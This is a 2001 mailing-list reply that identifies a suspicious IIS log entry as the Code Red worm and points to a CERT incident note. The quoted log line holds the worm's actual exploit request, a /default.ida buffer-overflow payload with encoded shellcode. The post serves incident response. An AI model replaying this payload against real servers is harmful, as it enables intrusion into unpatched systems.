[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: CGI Buffer Overflow?



>>>>> "Brian" == Brian Rectanus <brectanu@vt.edu> writes:

    Brian> Anyone seen this before?  I have looked around for similar
    Brian> attacks, but cannot find any info.  I assume that is a
    Brian> unicode string padded out with Ns.  How would I go about
    Brian> finding out what is in the string?


    Brian> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
    Brian> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
    Brian> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
    Brian> 078%u0000%u00=a HTTP/1.0" 400 328

"Code Red"  --> IIS

http://www.cert.org/incident_notes/IN-2001-08.html

Seems to be  quiet efficient, seven attempts so far ... 

-- 
(Dr.) Michael Hummel
mailto: mh@seitung.net || molino@gmx.net
--
fprint = F24D EAC6 E3D7 372C 9122 D510 EB24 01CA 0B56 B518
id: 1024D/0B56B518 key: http://www.seitung.net/key

Attachment: pgpzas8H75nmM.pgp
Description: PGP signature


Reply to: